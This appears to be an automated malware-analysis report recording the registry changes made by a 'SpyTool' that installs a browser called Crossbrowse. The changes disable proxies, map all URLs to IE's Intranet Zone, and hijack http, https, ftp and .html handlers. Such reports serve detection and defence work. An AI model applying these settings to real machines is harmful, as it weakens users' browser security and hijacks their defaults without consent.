The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsa19.tmp:648 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\Registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 7E 5D CA 4C 70 B6 9B 9C 41 F9 49 07 58 43 CB"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsa19.tmp:364 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 47 E1 1C 38 ED 38 31 88 6C E9 2D C3 31 74 5E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\Registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process gmsd_re_005010077.exe:1880 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 71 BE D7 DE 91 3B 0A 98 FF F6 BE 60 D7 77 A4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process nsq3D.tmp:240 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 71 E5 FD 5E 38 4A 2D 8C 18 DE 16 3D 9B 3A D9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process fsd34.exe:1368 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 E1 16 2B 09 C0 03 BB 4E 01 A7 4D 56 29 91 BF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Crossbrowse\Crossbrowse\Application]
"crossbrowse.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"
"SHELL32.dll,-8964"
"SHELL32.dll,-9319"
"SHELL32.dll,-9217"
"SHELL32.dll,-9216"
The process nsm32.tmp:444 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 BE 0C B4 92 71 37 4E 6B A7 12 15 62 F1 A8 35"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setup.exe:564 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"VersionMajor" = "2171"
"NoRepair" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2A.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2A.tmp\, , \??\%Program Files%\Crossbrowse\Crossbrowse,"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"HideIconsCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --hide-icons"
"ReinstallCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --make-default-browser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationDescription" = "Crossbrowse is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Crossbrowse."
[HKLM\SOFTWARE\Crossbrowse\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"IconsVisible" = "1"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationName" = "Crossbrowse"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerError" = "0"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities]
"ApplicationIcon" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayVersion" = "39.6.2171.95"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"ap" = "-stage:preconditions"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallLocation" = "%Program Files%\Crossbrowse\Crossbrowse\Application"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Crossbrowse\Installer]
"UninstallString" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayName" = "Crossbrowse"
"UninstallString" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe --uninstall --system-level"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"Version" = "39.6.2171.95"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\Startmenu]
"StartMenuInternet" = "Crossbrowse"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
"irc" = "CRSBRWSHTML"
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"Publisher" = "The Crossbrowse Authors"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D1 4B E0 19 3A 2A 3F 50 4F 0D A3 F9 E5 63 71"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
